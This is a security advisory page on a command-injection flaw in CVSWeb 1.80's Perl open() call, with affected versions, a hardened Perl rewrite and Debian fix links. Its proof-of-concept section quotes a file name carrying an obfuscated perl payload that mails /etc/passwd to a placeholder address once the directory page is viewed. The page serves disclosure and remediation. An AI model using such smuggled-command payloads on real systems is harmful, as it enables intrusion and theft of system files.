CVSWeb insecure perl "open" Vulnerability

BID:1469

Info

Bugtraq ID: 1469
Class: Input Validation Error
CVE:
Remote: Yes
Local: Yes
Published: Jul 12 2000 12:00AM
Updated: Jul 12 2000 12:00AM
Credit: Posted to BugTraq on July 12, 2000 by Joey Hess <[email protected]>
Vulnerable: CVSWeb Developer CVSWeb 1.80
- Debian Linux 2.3
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 3.5
- FreeBSD FreeBSD 3.4
- FreeBSD FreeBSD 3.3
- FreeBSD FreeBSD 3.2
- Mandriva Linux Mandrake 7.1
- Microsoft IIS 5.0
- Redhat Linux 6.2 sparc
- Redhat Linux 6.2 i386
- Redhat Linux 6.2 alpha
- Redhat Linux 6.1 sparc
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- SuSE Linux 7.0
- Turbolinux Turbolinux 6.1
- Turbolinux Turbolinux 6.0.5
- Turbolinux Turbolinux Server 6.5
Not Vulnerable: CVSWeb Developer CVSWeb 1.89
- Debian Linux 2.3
- FreeBSD FreeBSD 5.0 alpha
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0 alpha
- FreeBSD FreeBSD 4.0
- Microsoft IIS 5.0
- Redhat Linux 6.2 sparc
- Redhat Linux 6.2 i386
- Redhat Linux 6.2 alpha
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- SuSE Linux 7.0
CVSWeb Developer CVSWeb 1.86
- Debian Linux 2.3
- FreeBSD FreeBSD 5.0 alpha
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0 alpha
- FreeBSD FreeBSD 4.0
- Microsoft IIS 5.0
- Redhat Linux 6.2 sparc
- Redhat Linux 6.2 i386
- Redhat Linux 6.2 alpha
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- SuSE Linux 7.0

Discussion

CVSWeb 1.80 makes an insecure call to the Perl open function: a file name taken from the repository is interpolated into a shell command string that is then run through a pipe. This gives anyone with write access to a CVS repository the ability to execute arbitrary commands on the host running CVSWeb. The code being exploited is the following: open($fh, "rlog '$filenames' 2>/dev/null |")
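As an added illustration (not cvsweb's own code), the shape of the call above is shown beside a hardened replacement that validates the name and execs rlog without a shell; the sub names vulnerable_rlog_open, filename_is_safe and safe_rlog_open are assumptions made for this example.

```perl
# Added example, not cvsweb's own code. Names below are assumptions.
use strict;
use warnings;

# VULNERABLE (shape of the cvsweb 1.80 call): $filename is interpolated
# into a shell command line, so a name containing a quote and ';' closes
# the single quotes and the rest of the name runs as a command.
sub vulnerable_rlog_open {
    my ($filename) = @_;
    open(my $fh, "rlog '$filename' 2>/dev/null |") or die "open: $!";
    return $fh;
}

# Allowlist for repository-relative names: word characters, '.', ',', '-'
# and '/' only; no leading '-' (would be read as an rlog option), no '..'.
sub filename_is_safe {
    my ($filename) = @_;
    return 0 unless defined $filename && length $filename;
    return 0 unless $filename =~ m{\A[\w.,/-]+\z};
    return 0 if $filename =~ m{\A-};
    return 0 if grep { $_ eq '..' } split m{/}, $filename;
    return 1;
}

# HARDENED: validate first, then fork (Unix semantics) and exec rlog with
# an argument list, so no shell ever parses the name. stderr is silenced
# in the child, which replaces the "2>/dev/null" shell redirection.
sub safe_rlog_open {
    my ($filename) = @_;
    die "refusing unsafe file name\n" unless filename_is_safe($filename);
    my $pid = open(my $fh, '-|');          # fork; child's STDOUT feeds $fh
    die "fork failed: $!" unless defined $pid;
    if ($pid == 0) {                       # child process
        open(STDERR, '>', '/dev/null') or die "stderr: $!";
        exec 'rlog', $filename;            # list exec: execvp, no /bin/sh
        die "exec rlog failed: $!";
    }
    return $fh;                            # parent reads rlog's output
}

# Constructed sample names: an ordinary RCS file and one carrying the kind
# of shell metacharacters the advisory's attack depends on.
for my $name ('src/main.c,v', q{x';echo hi;'}) {
    printf "%-16s %s\n", $name, filename_is_safe($name) ? 'accepted' : 'rejected';
}
```

The allowlist is defence in depth; the list-form exec alone already removes the shell from the path the file name travels.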

Exploit / POC

From BugTraq Post:
An attack looks something like this:

SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE

Then the attacker either visits the cvsweb page that is a directory listing for the directory they put the trojan file in, or they wait for someone else to do the same. Views of this page cause the command to be executed, mailing /etc/passwd to the attacker or [insert something more nasty here].

Solution / Fix

Solution:
Upgrade to at least version 1.86, available from http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/

Debian:
Fixed in: Debian 2.1 (slink):
Source:
http://security.debian.org/dists/slink/updates/source/cvsweb_109.dsc
http://security.debian.org/dists/slink/updates/source/cvsweb_109.tar.gz
Architecture-independent binary:
http://security.debian.org/dists/slink/updates/binary-all/cvsweb_109_all.deb
Debian 2.2 (potato):
Source:
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79-3potato1.diff.gz
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79-3potato1.dsc
http://http.us.debian.org/debian/dists/potato/main/source/devel/cvsweb_1.79.orig.tar.gz
Architecture-independent binary:
http://http.us.debian.org/debian/dists/potato/main/binary-all/devel/cvsweb_1.79-3potato1.deb


References

References:
© CVE.report 2026